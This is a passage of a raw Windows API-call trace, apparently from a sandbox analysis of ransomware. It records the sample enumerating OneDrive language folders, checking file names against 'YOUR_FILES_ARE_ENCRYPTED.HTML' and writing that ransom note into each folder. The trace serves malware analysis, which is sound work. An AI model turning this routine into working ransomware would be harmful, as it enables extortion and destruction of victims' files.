nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.028] CloseHandle (hObject=0x5b8) returned 1 [0162.028] GetProcessHeap () returned 0x270000 [0162.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.029] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pt-br", cAlternateFileName="")) returned 1 [0162.029] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br") returned 77 [0162.029] GetProcessHeap () returned 0x270000 [0162.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.029] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br" [0162.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*" [0162.029] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.030] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.030] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.030] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.030] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0162.030] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.031] lstrlenW (lpString=".mui") returned 4 [0162.031] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.031] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.031] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.031] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.031] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.034] CloseHandle (hObject=0x5b8) returned 1 [0162.034] GetProcessHeap () returned 0x270000 [0162.035] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 
[0162.035] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0162.035] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt") returned 77 [0162.035] GetProcessHeap () returned 0x270000 [0162.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.035] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt" [0162.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*" [0162.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8b2f090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.036] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.036] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.036] lstrlenW (lpString=".mui") returned 4 [0162.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.036] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e74ed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e74ed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.036] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.036] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.037] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.039] CloseHandle (hObject=0x5b8) returned 1 [0162.040] GetProcessHeap () returned 0x270000 [0162.041] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.041] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="qut-latn", cAlternateFileName="")) returned 1 [0162.041] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn") returned 80 [0162.041] GetProcessHeap () returned 0x270000 [0162.041] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.041] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn" [0162.041] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*" [0162.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xa8e74ed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.041] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\FileSync.LocalizedResources.dll.mui") returned 116 [0162.041] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.041] lstrlenW (lpString=".mui") returned 4 [0162.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.042] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9017df0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9017df0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.042] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.042] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0162.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\qut-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.042] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.045] CloseHandle (hObject=0x5b8) returned 1 [0162.045] GetProcessHeap () returned 0x270000 [0162.046] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.046] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="quz-pe", cAlternateFileName="")) returned 1 [0162.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe") returned 78 [0162.046] GetProcessHeap () returned 0x270000 [0162.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.046] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe" [0162.046] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*" [0162.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9017df0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.047] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\FileSync.LocalizedResources.dll.mui") returned 114 [0162.047] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.047] lstrlenW (lpString=".mui") returned 4 [0162.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.047] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa93f61b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa93f61b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.047] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.047] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0162.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\quz-pe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.048] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.050] CloseHandle (hObject=0x5b8) returned 1 [0162.051] GetProcessHeap () returned 0x270000 [0162.051] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.051] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa46bf810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa46bf810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa46e5970, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xb9ca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RemoteAccess.dll", cAlternateFileName="REMOTE~1.DLL")) returned 1 [0162.052] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll") returned 88 [0162.052] lstrcmpW (lpString1="RemoteAccess.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.052] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0162.052] lstrlenW (lpString=".dll") 
